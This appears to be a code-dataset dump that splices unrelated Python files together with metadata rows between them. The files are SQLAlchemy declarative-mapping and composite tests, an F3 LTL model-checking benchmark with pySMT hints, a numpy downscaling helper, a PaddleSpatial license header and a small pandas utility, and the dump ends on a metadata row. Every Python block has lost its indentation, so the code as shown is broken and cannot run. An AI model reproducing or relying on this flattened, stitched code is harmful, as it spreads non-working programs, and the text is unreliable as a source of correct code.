def test_mapped_column_omit_fn(self, decl_base):
class MixinOne:
name: Mapped[str]
x: Mapped[int]
y: Mapped[int] = mapped_column()
class A(MixinOne, decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
# ordering of cols is TODO
eq_(A.__table__.c.keys(), ["id", "y", "name", "x"])
def test_mc_duplication_plain(self, decl_base):
class MixinOne:
name: Mapped[str] = mapped_column()
class A(MixinOne, decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
class B(MixinOne, decl_base):
__tablename__ = "b"
id: Mapped[int] = mapped_column(primary_key=True)
is_not(A.__table__.c.name, B.__table__.c.name)
def test_mc_duplication_declared_attr(self, decl_base):
class MixinOne:
@declared_attr
def name(cls) -> Mapped[str]:
return mapped_column()
class A(MixinOne, decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
class B(MixinOne, decl_base):
__tablename__ = "b"
id: Mapped[int] = mapped_column(primary_key=True)
is_not(A.__table__.c.name, B.__table__.c.name)
def test_relationship_requires_declared_attr(self, decl_base):
class Related(decl_base):
__tablename__ = "related"
id: Mapped[int] = mapped_column(primary_key=True)
class HasRelated:
related_id: Mapped[int] = mapped_column(ForeignKey(Related.id))
related: Mapped[Related] = relationship()
with expect_raises_message(
sa_exc.InvalidRequestError,
r"Mapper properties \(i.e. deferred,column_property\(\), "
r"relationship\(\), etc.\) must be declared",
):
class A(HasRelated, decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
def test_relationship_duplication_declared_attr(self, decl_base):
class Related(decl_base):
__tablename__ = "related"
id: Mapped[int] = mapped_column(primary_key=True)
class HasRelated:
related_id: Mapped[int] = mapped_column(ForeignKey(Related.id))
@declared_attr
def related(cls) -> Mapped[Related]:
return relationship()
class A(HasRelated, decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
class B(HasRelated, decl_base):
__tablename__ = "b"
id: Mapped[int] = mapped_column(primary_key=True)
self.assert_compile(
select(A).join(A.related),
"SELECT a.id, a.related_id FROM a "
"JOIN related ON related.id = a.related_id",
)
self.assert_compile(
select(B).join(B.related),
"SELECT b.id, b.related_id FROM b "
"JOIN related ON related.id = b.related_id",
)
class RelationshipLHSTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = "default"
@testing.fixture
def decl_base(self):
class Base(DeclarativeBase):
pass
yield Base
Base.registry.dispose()
def test_no_typing_in_rhs(self, decl_base):
class A(decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
bs = relationship("List['B']")
class B(decl_base):
__tablename__ = "b"
id: Mapped[int] = mapped_column(Integer, primary_key=True)
a_id: Mapped[int] = mapped_column(ForeignKey("a.id"))
with expect_raises_message(
sa_exc.InvalidRequestError,
r"When initializing mapper Mapper\[A\(a\)\], expression "
r'"relationship\(\"List\[\'B\'\]\"\)\" seems to be using a '
r"generic class as the argument to relationship\(\); please "
r"state the generic argument using an annotation, e.g. "
r'"bs: Mapped\[List\[\'B\'\]\] = relationship\(\)"',
):
decl_base.registry.configure()
def test_required_no_arg(self, decl_base):
with expect_raises_message(
sa_exc.ArgumentError,
r"Python typing annotation is required for attribute "
r'"A.bs" when primary '
r'argument\(s\) for "Relationship" construct are None or '
r"not present",
):
class A(decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
bs = relationship()
def test_rudimentary_dataclasses_support(self, registry):
@registry.mapped
@dataclasses.dataclass
class A:
__tablename__ = "a"
__sa_dataclass_metadata_key__ = "sa"
id: Mapped[int] = mapped_column(primary_key=True)
bs: List["B"] = dataclasses.field( # noqa: F821
default_factory=list, metadata={"sa": relationship()}
)
@registry.mapped
@dataclasses.dataclass
class B:
__tablename__ = "b"
id: Mapped[int] = mapped_column(primary_key=True)
a_id = mapped_column(ForeignKey("a.id"))
self.assert_compile(
select(A).join(A.bs), "SELECT a.id FROM a JOIN b ON a.id = b.a_id"
)
def test_basic_bidirectional(self, decl_base):
class A(decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
data: Mapped[str] = mapped_column()
bs: Mapped[List["B"]] = relationship( # noqa F821
back_populates="a"
)
class B(decl_base):
__tablename__ = "b"
id: Mapped[int] = mapped_column(Integer, primary_key=True)
a_id: Mapped[int] = mapped_column(ForeignKey("a.id"))
a: Mapped["A"] = relationship(
back_populates="bs", primaryjoin=a_id == A.id
)
a1 = A(data="data")
b1 = B()
a1.bs.append(b1)
is_(a1, b1.a)
def test_wrong_annotation_type_one(self, decl_base):
with expect_raises_message(
sa_exc.ArgumentError,
r"Type annotation for \"A.data\" should use the "
r"syntax \"Mapped\['B'\]\" or \"Relationship\['B'\]\"",
):
class A(decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
data: "B" = relationship() # type: ignore # noqa
def test_wrong_annotation_type_two(self, decl_base):
with expect_raises_message(
sa_exc.ArgumentError,
r"Type annotation for \"A.data\" should use the "
r"syntax \"Mapped\[B\]\" or \"Relationship\[B\]\"",
):
class B(decl_base):
__tablename__ = "b"
id: Mapped[int] = mapped_column(primary_key=True)
class A(decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
data: B = relationship() # type: ignore # noqa
def test_wrong_annotation_type_three(self, decl_base):
with expect_raises_message(
sa_exc.ArgumentError,
r"Type annotation for \"A.data\" should use the "
r"syntax \"Mapped\['List\[B\]'\]\" or "
r"\"Relationship\['List\[B\]'\]\"",
):
class B(decl_base):
__tablename__ = "b"
id: Mapped[int] = mapped_column(primary_key=True)
class A(decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
data: "List[B]" = relationship() # type: ignore # noqa
def test_collection_class_uselist(self, decl_base):
class A(decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
data: Mapped[str] = mapped_column()
bs_list: Mapped[List["B"]] = relationship( # noqa F821
viewonly=True
)
bs_set: Mapped[Set["B"]] = relationship(viewonly=True) # noqa F821
bs_list_warg: Mapped[List["B"]] = relationship( # noqa F821
"B", viewonly=True
)
bs_set_warg: Mapped[Set["B"]] = relationship( # noqa F821
"B", viewonly=True
)
class B(decl_base):
__tablename__ = "b"
id: Mapped[int] = mapped_column(Integer, primary_key=True)
a_id: Mapped[int] = mapped_column(ForeignKey("a.id"))
a: Mapped["A"] = relationship(viewonly=True)
a_warg: Mapped["A"] = relationship("A", viewonly=True)
is_(A.__mapper__.attrs["bs_list"].collection_class, list)
is_(A.__mapper__.attrs["bs_set"].collection_class, set)
is_(A.__mapper__.attrs["bs_list_warg"].collection_class, list)
is_(A.__mapper__.attrs["bs_set_warg"].collection_class, set)
is_true(A.__mapper__.attrs["bs_list"].uselist)
is_true(A.__mapper__.attrs["bs_set"].uselist)
is_true(A.__mapper__.attrs["bs_list_warg"].uselist)
is_true(A.__mapper__.attrs["bs_set_warg"].uselist)
is_false(B.__mapper__.attrs["a"].uselist)
is_false(B.__mapper__.attrs["a_warg"].uselist)
def test_collection_class_dict_no_collection(self, decl_base):
class A(decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
data: Mapped[str] = mapped_column()
bs: Mapped[Dict[str, "B"]] = relationship() # noqa F821
class B(decl_base):
__tablename__ = "b"
id: Mapped[int] = mapped_column(Integer, primary_key=True)
a_id: Mapped[int] = mapped_column(ForeignKey("a.id"))
name: Mapped[str] = mapped_column()
# this is the old collections message. it's not great, but at the
# moment I like that this is what's raised
with expect_raises_message(
sa_exc.ArgumentError,
"Type InstrumentedDict must elect an appender",
):
decl_base.registry.configure()
def test_collection_class_dict_attr_mapped_collection(self, decl_base):
class A(decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
data: Mapped[str] = mapped_column()
bs: Mapped[MappedCollection[str, "B"]] = relationship( # noqa F821
collection_class=attribute_mapped_collection("name")
)
class B(decl_base):
__tablename__ = "b"
id: Mapped[int] = mapped_column(Integer, primary_key=True)
a_id: Mapped[int] = mapped_column(ForeignKey("a.id"))
name: Mapped[str] = mapped_column()
decl_base.registry.configure()
a1 = A()
b1 = B(name="foo")
# collection appender on MappedCollection
a1.bs.set(b1)
is_(a1.bs["foo"], b1)
class CompositeTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = "default"
@testing.fixture
def dataclass_point_fixture(self, decl_base):
@dataclasses.dataclass
class Point:
x: int
y: int
class Edge(decl_base):
__tablename__ = "edge"
id: Mapped[int] = mapped_column(primary_key=True)
graph_id: Mapped[int] = mapped_column(ForeignKey("graph.id"))
start: Mapped[Point] = composite(
Point, mapped_column("x1"), mapped_column("y1")
)
end: Mapped[Point] = composite(
Point, mapped_column("x2"), mapped_column("y2")
)
class Graph(decl_base):
__tablename__ = "graph"
id: Mapped[int] = mapped_column(primary_key=True)
edges: Mapped[List[Edge]] = relationship()
decl_base.metadata.create_all(testing.db)
return Point, Graph, Edge
def test_composite_setup(self, dataclass_point_fixture):
Point, Graph, Edge = dataclass_point_fixture
with fixture_session() as sess:
sess.add(
Graph(
edges=[
Edge(start=Point(1, 2), end=Point(3, 4)),
Edge(start=Point(7, 8), end=Point(5, 6)),
]
)
)
sess.commit()
self.assert_compile(
select(Edge),
"SELECT edge.id, edge.graph_id, edge.x1, edge.y1, "
"edge.x2, edge.y2 FROM edge",
)
with fixture_session() as sess:
g1 = sess.scalar(select(Graph))
# round trip!
eq_(g1.edges[0].end, Point(3, 4))
def test_named_setup(self, decl_base: Type[DeclarativeBase]):
@dataclasses.dataclass
class Address:
street: str
state: str
zip_: str
class User(decl_base):
__tablename__ = "user"
id: Mapped[int] = mapped_column(primary_key=True)
name: Mapped[str] = mapped_column()
address: Mapped[Address] = composite(
Address, mapped_column(), mapped_column(), mapped_column("zip")
)
decl_base.metadata.create_all(testing.db)
with fixture_session() as sess:
sess.add(
User(
name="user 1",
address=Address("123 anywhere street", "NY", "12345"),
)
)
sess.commit()
with fixture_session() as sess:
u1 = sess.scalar(select(User))
# round trip!
eq_(u1.address, Address("123 anywhere street", "NY", "12345"))
def test_no_fwd_ref_annotated_setup(self, decl_base):
@dataclasses.dataclass
class Address:
street: str
state: str
zip_: str
with expect_raises_message(
ArgumentError,
r"Can't use forward ref ForwardRef\('Address'\) "
r"for composite class argument",
):
class User(decl_base):
__tablename__ = "user"
id: Mapped[int] = mapped_column(primary_key=True)
name: Mapped[str] = mapped_column()
address: Mapped["Address"] = composite(
mapped_column(), mapped_column(), mapped_column("zip")
)
def test_fwd_ref_plus_no_mapped(self, decl_base):
@dataclasses.dataclass
class Address:
street: str
state: str
zip_: str
with expect_raises_message(
ArgumentError,
r"Type annotation for \"User.address\" should use the syntax "
r"\"Mapped\['Address'\]\" or \"MappedColumn\['Address'\]\"",
):
class User(decl_base):
__tablename__ = "user"
id: Mapped[int] = mapped_column(primary_key=True)
name: Mapped[str] = mapped_column()
address: "Address" = composite( # type: ignore
mapped_column(), mapped_column(), mapped_column("zip")
)
def test_fwd_ref_ok_explicit_cls(self, decl_base):
@dataclasses.dataclass
class Address:
street: str
state: str
zip_: str
class User(decl_base):
__tablename__ = "user"
id: Mapped[int] = mapped_column(primary_key=True)
name: Mapped[str] = mapped_column()
address: Mapped["Address"] = composite(
Address, mapped_column(), mapped_column(), mapped_column("zip")
)
self.assert_compile(
select(User),
'SELECT "user".id, "user".name, "user".street, '
'"user".state, "user".zip FROM "user"',
)
def test_cls_annotated_setup(self, decl_base):
@dataclasses.dataclass
class Address:
street: str
state: str
zip_: str
class User(decl_base):
__tablename__ = "user"
id: Mapped[int] = mapped_column(primary_key=True)
name: Mapped[str] = mapped_column()
address: Mapped[Address] = composite(
mapped_column(), mapped_column(), mapped_column("zip")
)
decl_base.metadata.create_all(testing.db)
with fixture_session() as sess:
sess.add(
User(
name="user 1",
address=Address("123 anywhere street", "NY", "12345"),
)
)
sess.commit()
with fixture_session() as sess:
u1 = sess.scalar(select(User))
# round trip!
eq_(u1.address, Address("123 anywhere street", "NY", "12345"))
def test_one_col_setup(self, decl_base):
@dataclasses.dataclass
class Address:
street: str
class User(decl_base):
__tablename__ = "user"
id: Mapped[int] = mapped_column(primary_key=True)
name: Mapped[str] = mapped_column()
address: Mapped[Address] = composite(Address, mapped_column())
decl_base.metadata.create_all(testing.db)
with fixture_session() as sess:
sess.add(
User(
name="user 1",
address=Address("123 anywhere street"),
)
)
sess.commit()
with fixture_session() as sess:
u1 = sess.scalar(select(User))
# round trip!
eq_(u1.address, Address("123 anywhere street"))
class AllYourFavoriteHitsTest(fixtures.TestBase, testing.AssertsCompiledSQL):
"""try a bunch of common mappings using the new style"""
__dialect__ = "default"
def test_employee_joined_inh(self, decl_base: Type[DeclarativeBase]):
str50 = Annotated[str, 50]
str30 = Annotated[str, 30]
opt_str50 = Optional[str50]
decl_base.registry.update_type_annotation_map(
{str50: String(50), str30: String(30)}
)
class Company(decl_base):
__tablename__ = "company"
company_id: Mapped[int] = mapped_column(Integer, primary_key=True)
name: Mapped[str50]
employees: Mapped[Set["Person"]] = relationship() # noqa F821
class Person(decl_base):
__tablename__ = "person"
person_id: Mapped[int] = mapped_column(primary_key=True)
company_id: Mapped[int] = mapped_column(
ForeignKey("company.company_id")
)
name: Mapped[str50]
type: Mapped[str30] = mapped_column()
__mapper_args__ = {"polymorphic_on": type}
class Engineer(Person):
__tablename__ = "engineer"
person_id: Mapped[int] = mapped_column(
ForeignKey("person.person_id"), primary_key=True
)
status: Mapped[str] = mapped_column(String(30))
engineer_name: Mapped[opt_str50]
primary_language: Mapped[opt_str50]
class Manager(Person):
__tablename__ = "manager"
person_id: Mapped[int] = mapped_column(
ForeignKey("person.person_id"), primary_key=True
)
status: Mapped[str] = mapped_column(String(30))
manager_name: Mapped[str50]
is_(Person.__mapper__.polymorphic_on, Person.__table__.c.type)
# the SELECT statements here confirm the columns present and their
# ordering
self.assert_compile(
select(Person),
"SELECT person.person_id, person.company_id, person.name, "
"person.type FROM person",
)
self.assert_compile(
select(Manager),
"SELECT manager.person_id, person.person_id AS person_id_1, "
"person.company_id, person.name, person.type, manager.status, "
"manager.manager_name FROM person "
"JOIN manager ON person.person_id = manager.person_id",
)
self.assert_compile(
select(Company).join(Company.employees.of_type(Engineer)),
"SELECT company.company_id, company.name FROM company JOIN "
"(person JOIN engineer ON person.person_id = engineer.person_id) "
"ON company.company_id = person.company_id",
)
| 33.390848
| 79
| 0.592086
|
a3df0f2f7c69c4185647f82d458eadb5b3088c43
| 9,978
|
py
|
Python
|
benchmarks/f3_wrong_hints/scaling_ltl_infinite_state/17-extending_bound_34.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | 3
|
2021-04-23T23:29:26.000Z
|
2022-03-23T10:00:30.000Z
|
benchmarks/f3_wrong_hints/scaling_ltl_infinite_state/17-extending_bound_34.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | null | null | null |
benchmarks/f3_wrong_hints/scaling_ltl_infinite_state/17-extending_bound_34.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | 1
|
2021-11-17T22:02:56.000Z
|
2021-11-17T22:02:56.000Z
|
from typing import Tuple, FrozenSet
from collections.abc import Iterable
from mathsat import msat_term, msat_env
from mathsat import msat_make_constant, msat_declare_function
from mathsat import msat_get_integer_type, msat_get_rational_type, msat_get_bool_type
from mathsat import msat_make_and, msat_make_not, msat_make_or
from mathsat import msat_make_leq, msat_make_equal
from mathsat import msat_make_number, msat_make_plus
from pysmt.environment import Environment as PysmtEnv
import pysmt.typing as types
from ltl.ltl import TermMap, LTLEncoder
from utils import name_next, symb_to_next
from hint import Hint, Location
def msat_make_lt(menv: msat_env, arg0: msat_term, arg1: msat_term):
geq = msat_make_geq(menv, arg0, arg1)
return msat_make_not(menv, geq)
def msat_make_geq(menv: msat_env, arg0: msat_term, arg1: msat_term):
return msat_make_leq(menv, arg1, arg0)
def msat_make_gt(menv: msat_env, arg0: msat_term, arg1: msat_term):
leq = msat_make_leq(menv, arg0, arg1)
return msat_make_not(menv, leq)
def msat_make_impl(menv: msat_env, arg0: msat_term, arg1: msat_term):
n_arg0 = msat_make_not(menv, arg0)
return msat_make_or(menv, n_arg0, arg1)
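# check_ltl builds the symbolic transition system over the real variables i, r, l and the
# boolean inc_i, and returns (curr2next map, init, trans, ltl), where the LTL property
# encoded below is (G F inc_i) -> !(G F (r > i)).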
def check_ltl(menv: msat_env, enc: LTLEncoder) -> Tuple[Iterable, msat_term,
msat_term, msat_term]:
assert menv
assert isinstance(menv, msat_env)
assert enc
assert isinstance(enc, LTLEncoder)
bool_type = msat_get_bool_type(menv)
real_type = msat_get_rational_type(menv)
i = msat_declare_function(menv, "i", real_type)
i = msat_make_constant(menv, i)
r = msat_declare_function(menv, "r", real_type)
r = msat_make_constant(menv, r)
l = msat_declare_function(menv, "l", real_type)
l = msat_make_constant(menv, l)
inc_i = msat_declare_function(menv, "inc_i", bool_type)
inc_i = msat_make_constant(menv, inc_i)
x_i = msat_declare_function(menv, name_next("i"), real_type)
x_i = msat_make_constant(menv, x_i)
x_r = msat_declare_function(menv, name_next("r"), real_type)
x_r = msat_make_constant(menv, x_r)
x_l = msat_declare_function(menv, name_next("l"), real_type)
x_l = msat_make_constant(menv, x_l)
x_inc_i = msat_declare_function(menv, name_next("inc_i"), bool_type)
x_inc_i = msat_make_constant(menv, x_inc_i)
curr2next = {i: x_i, r: x_r, l: x_l, inc_i: x_inc_i}
zero = msat_make_number(menv, "0")
one = msat_make_number(menv, "1")
r_gt_0 = msat_make_gt(menv, r, zero)
r_lt_l = msat_make_lt(menv, r, l)
i_geq_0 = msat_make_geq(menv, i, zero)
init = msat_make_and(menv, r_gt_0, r_lt_l)
init = msat_make_and(menv, init,
msat_make_and(menv, i_geq_0,
msat_make_not(menv, inc_i)))
init = msat_make_and(menv, init, msat_make_gt(menv, l, zero))
# r' = r
trans = msat_make_equal(menv, x_r, r)
# i < l -> ((inc_i' & i' = i + 1) | (!inc_i' & i' = i)) & l' = l
i_lt_l = msat_make_lt(menv, i, l)
x_i_eq_i_p_1 = msat_make_and(menv, x_inc_i,
msat_make_equal(menv, x_i,
msat_make_plus(menv, i, one)))
x_i_eq_i = msat_make_and(menv, msat_make_not(menv, x_inc_i),
msat_make_equal(menv, x_i, i))
x_i_eq_i_p_1_or_i = msat_make_or(menv, x_i_eq_i_p_1, x_i_eq_i)
x_l_eq_l = msat_make_equal(menv, x_l, l)
x_i_eq_i_p_1_or_i_and_x_l_eq_l = msat_make_and(menv, x_i_eq_i_p_1_or_i,
x_l_eq_l)
trans = msat_make_and(menv, trans,
msat_make_impl(menv, i_lt_l,
x_i_eq_i_p_1_or_i_and_x_l_eq_l))
# i >= l -> i' = 0 & l' = l + 1 & !inc_i'
i_geq_l = msat_make_geq(menv, i, l)
x_i_eq_0 = msat_make_equal(menv, x_i, zero)
x_l_eq_l_p_1 = msat_make_equal(menv, x_l, msat_make_plus(menv, l, one))
x_i_eq_0_and_x_l_eq_l_p_1 = msat_make_and(menv,
msat_make_and(menv, x_i_eq_0,
x_l_eq_l_p_1),
msat_make_not(menv, x_inc_i))
trans = msat_make_and(menv, trans,
msat_make_impl(menv, i_geq_l,
x_i_eq_0_and_x_l_eq_l_p_1))
# (G F inc_i) -> ! G F r > i
G_F_x_i_gt_i = enc.make_G(enc.make_F(inc_i))
r_gt_i = msat_make_gt(menv, r, i)
n_G_F_r_gt_i = msat_make_not(menv, enc.make_G(enc.make_F(r_gt_i)))
ltl = msat_make_impl(menv, G_F_x_i_gt_i, n_G_F_r_gt_i)
return TermMap(curr2next), init, trans, ltl
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
i = mgr.Symbol("i", types.REAL)
r = mgr.Symbol("r", types.REAL)
l = mgr.Symbol("l", types.REAL)
inc_i = mgr.Symbol("inc_i", types.BOOL)
symbs = frozenset([i, r, l, inc_i])
x_i = symb_to_next(mgr, i)
x_r = symb_to_next(mgr, r)
x_l = symb_to_next(mgr, l)
x_inc_i = symb_to_next(mgr, inc_i)
res = []
n0 = mgr.Real(0)
n1 = mgr.Real(1)
stutter = mgr.Equals(x_i, i)
loc = Location(env, mgr.GE(i, n0), stutterT=stutter)
loc.set_progress(0, mgr.Equals(x_i, mgr.Plus(i, n1)))
h_i = Hint("h_i0", env, frozenset([i]), symbs)
h_i.set_locs([loc])
res.append(h_i)
loc = Location(env, mgr.GE(r, n0))
loc.set_progress(0, mgr.Equals(x_r, mgr.Plus(r, n1)))
h_r = Hint("h_r0", env, frozenset([r]), symbs)
h_r.set_locs([loc])
res.append(h_r)
loc = Location(env, inc_i)
loc.set_progress(0, x_inc_i)
h_inc = Hint("h_inc0", env, frozenset([inc_i]), symbs)
h_inc.set_locs([loc])
res.append(h_inc)
stutter = mgr.Equals(x_i, i)
loc = Location(env, mgr.LE(i, n0), stutterT=stutter)
loc.set_progress(0, mgr.Equals(x_i, mgr.Minus(i, n1)))
h_i = Hint("h_i1", env, frozenset([i]), symbs)
h_i.set_locs([loc])
res.append(h_i)
loc = Location(env, mgr.LE(r, n0))
loc.set_progress(0, mgr.Equals(x_r, mgr.Minus(r, n1)))
h_r = Hint("h_r1", env, frozenset([r]), symbs)
h_r.set_locs([loc])
res.append(h_r)
loc = Location(env, mgr.LE(l, n0))
loc.set_progress(0, mgr.Equals(x_l, mgr.Minus(l, n1)))
h_l = Hint("h_l1", env, frozenset([l]), symbs)
h_l.set_locs([loc])
res.append(h_l)
loc = Location(env, mgr.Not(inc_i))
loc.set_progress(0, mgr.Not(x_inc_i))
h_inc = Hint("h_inc1", env, frozenset([inc_i]), symbs)
h_inc.set_locs([loc])
res.append(h_inc)
loc0 = Location(env, mgr.GE(i, n0))
loc0.set_progress(1, mgr.Equals(x_i, mgr.Plus(i, n1)))
loc1 = Location(env, mgr.GE(i, n0))
loc1.set_progress(0, mgr.Equals(x_i, i))
h_i = Hint("h_i2", env, frozenset([i]), symbs)
h_i.set_locs([loc0, loc1])
res.append(h_i)
loc0 = Location(env, mgr.GE(r, n0))
loc0.set_progress(1, mgr.Equals(x_r, r))
loc1 = Location(env, mgr.GE(r, n0))
loc1.set_progress(0, mgr.Equals(x_r, mgr.Plus(r, n1)))
h_r = Hint("h_r2", env, frozenset([r]), symbs)
h_r.set_locs([loc0, loc1])
res.append(h_r)
loc0 = Location(env, mgr.GE(l, n0))
loc0.set_progress(1, mgr.Equals(x_l, mgr.Plus(l, n1)))
loc1 = Location(env, mgr.GE(l, n0))
loc1.set_progress(0, mgr.Equals(x_l, l))
h_l = Hint("h_l2", env, frozenset([l]), symbs)
h_l.set_locs([loc0, loc1])
res.append(h_l)
loc0 = Location(env, mgr.Not(inc_i))
loc0.set_progress(1, x_inc_i)
loc1 = Location(env, inc_i)
loc1.set_progress(0, mgr.Not(x_inc_i))
h_inc = Hint("h_inc2", env, frozenset([inc_i]), symbs)
h_inc.set_locs([loc0, loc1])
res.append(h_inc)
loc0 = Location(env, mgr.GE(r, n0), mgr.GE(i, n0),
stutterT=mgr.Equals(x_r, mgr.Plus(r, i)))
loc0.set_progress(1, mgr.Equals(x_r, r))
loc1 = Location(env, mgr.GE(r, n0))
loc1.set_progress(0, mgr.Equals(x_r, mgr.Plus(r, n1)))
h_r = Hint("h_r3", env, frozenset([r]), symbs)
h_r.set_locs([loc0, loc1])
res.append(h_r)
loc0 = Location(env, mgr.Not(inc_i))
loc0.set_progress(1, x_inc_i)
loc1 = Location(env, inc_i, stutterT=x_inc_i)
loc1.set_progress(0, mgr.Not(x_inc_i))
h_inc = Hint("h_inc3", env, frozenset([inc_i]), symbs)
h_inc.set_locs([loc0, loc1])
res.append(h_inc)
loc0 = Location(env, mgr.GE(i, n0))
loc0.set_progress(1, mgr.Equals(x_i, mgr.Plus(i, n1)))
loc1 = Location(env, mgr.GE(i, n0))
loc1.set_progress(2, mgr.Equals(x_i, i))
loc2 = Location(env, mgr.GE(i, n0))
loc2.set_progress(0, mgr.Equals(x_i, i))
h_i = Hint("h_i4", env, frozenset([i]), symbs)
h_i.set_locs([loc0, loc1, loc2])
res.append(h_i)
loc0 = Location(env, mgr.GE(r, n0))
loc0.set_progress(1, mgr.Equals(x_r, r))
loc1 = Location(env, mgr.GE(r, n0))
loc1.set_progress(2, mgr.Equals(x_r, mgr.Plus(r, n1)))
loc2 = Location(env, mgr.GE(r, n0))
loc2.set_progress(0, mgr.Equals(x_r, r))
h_r = Hint("h_r4", env, frozenset([r]), symbs)
h_r.set_locs([loc0, loc1, loc2])
res.append(h_r)
loc0 = Location(env, mgr.GE(l, n0))
loc0.set_progress(1, mgr.Equals(x_l, mgr.Plus(l, n1)))
loc1 = Location(env, mgr.GE(l, n0))
loc1.set_progress(2, mgr.Equals(x_l, l))
loc2 = Location(env, mgr.GE(l, n0))
loc2.set_progress(0, mgr.Equals(x_l, l))
h_l = Hint("h_l4", env, frozenset([l]), symbs)
h_l.set_locs([loc0, loc1, loc2])
res.append(h_l)
loc0 = Location(env, mgr.Not(inc_i))
loc0.set_progress(1, x_inc_i)
loc1 = Location(env, inc_i, stutterT=x_inc_i)
loc1.set_progress(2, mgr.Not(x_inc_i))
loc2 = Location(env, mgr.Not(inc_i))
loc2.set_progress(0, mgr.Not(x_inc_i))
h_inc = Hint("h_inc4", env, frozenset([inc_i]), symbs)
h_inc.set_locs([loc0, loc1, loc2])
res.append(h_inc)
return frozenset(res)
| 35.133803
| 89
| 0.62738
|
f1b094dabab78ac45c6dea377c936f76636c9199
| 1,244
|
py
|
Python
|
src/yativ/scale.py
|
Ahuge/yativ
|
506511c9f5c6d77c6e488f6f593044b78541cfb5
|
[
"MIT"
] | null | null | null |
src/yativ/scale.py
|
Ahuge/yativ
|
506511c9f5c6d77c6e488f6f593044b78541cfb5
|
[
"MIT"
] | null | null | null |
src/yativ/scale.py
|
Ahuge/yativ
|
506511c9f5c6d77c6e488f6f593044b78541cfb5
|
[
"MIT"
] | null | null | null |
import numpy
def scale(input, float_factor):
def downsize(factor):
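# Block-average the input: each output cell is the mean of one factor-by-factor
# window of input values (windows at the edges may be smaller).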
new_arr = []
for row_index_mult, _ in enumerate(input[::factor]):
new_arr.append([])
for col_index_mult, _ in enumerate(input[0][::factor]):
values = []
for row_factor_index in range(int(factor)):
ri = (row_index_mult*factor)+row_factor_index
if ri < len(input):
row = input[ri]
for col_factor_index in range(int(factor)):
ci = (col_index_mult*factor)+col_factor_index
if ci < len(row):
cell = row[ci]
values.append(cell)
if values:
new_arr[-1].append(sum(values)/len(values))
return numpy.asarray(new_arr)
def upscale(factor):
raise NotImplementedError("Upscaling is not yet implemented!")
if float_factor == 1:
return input
elif float_factor > 1:
# print("Scaling %s to %s" % (input.shape[0], input.shape[0]/factor))
return downsize(int(float_factor))
else:
return upscale(float_factor)
| 36.588235
| 77
| 0.515273
|
27259f19c85cb2823b24fb37ca140ea2a132cc06
| 878
|
py
|
Python
|
paddlespatial/utils/__init__.py
|
PaddlePaddle/PaddleSpatial
|
71e5918b0af9e9640e08901e5e95751b093a40dc
|
[
"Apache-2.0"
] | 38
|
2021-07-12T15:07:02.000Z
|
2022-03-10T12:07:15.000Z
|
paddlespatial/utils/__init__.py
|
PaddlePaddle/PaddleSpatial
|
71e5918b0af9e9640e08901e5e95751b093a40dc
|
[
"Apache-2.0"
] | 3
|
2022-03-08T10:54:29.000Z
|
2022-03-30T07:19:05.000Z
|
paddlespatial/utils/__init__.py
|
PaddlePaddle/PaddleSpatial
|
71e5918b0af9e9640e08901e5e95751b093a40dc
|
[
"Apache-2.0"
] | 2
|
2021-12-07T06:47:16.000Z
|
2022-02-14T01:43:41.000Z
|
#!/usr/bin/python
#coding=utf-8
################################################################################
#
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
"""
Brief:
Author: zhoujingbo@baidu.com
Date: 2021-10-29 00:18:52
"""
| 33.769231
| 80
| 0.609339
|
e84718556075a03709f91b370f29e2db26f3e99c
| 447
|
py
|
Python
|
lambdata_andrea/__init__.py
|
supai-red/lambdata_AC
|
5c2655b483c01c3386cf79960bcc6a8a9a57c443
|
[
"MIT"
] | null | null | null |
lambdata_andrea/__init__.py
|
supai-red/lambdata_AC
|
5c2655b483c01c3386cf79960bcc6a8a9a57c443
|
[
"MIT"
] | 4
|
2020-03-24T18:06:43.000Z
|
2021-06-02T00:49:58.000Z
|
lambdata_andrea/__init__.py
|
supai-red/lambdata_AC
|
5c2655b483c01c3386cf79960bcc6a8a9a57c443
|
[
"MIT"
] | null | null | null |
"""
lambdata - a collection of data science helper functions
"""
import pandas as pd
import numpy as np
def check_nulls(df):
"""A function to check for and print DataFrame nulls."""
print(df.isnull().sum().sum())
return
def list_series_df(a_list):
"""A function to turn a list, into a series, and then a DataFrame.."""
s = pd.Series(a_list)
df = pd.DataFrame(s)
print("The DataFrame is")
return df
| 24.833333
| 73
| 0.642058
|
271fe8cb4638bb263355e0c702a01f25cb73e941
| 2,188
|
py
|
Python
|
django/www/MeteoGaliciaDB/registros/views.py
|
hugo-lorenzo-mato/Meteo-Galicia-DB
|
3dd52534c16216de5f25cd40877d2facc7cffe24
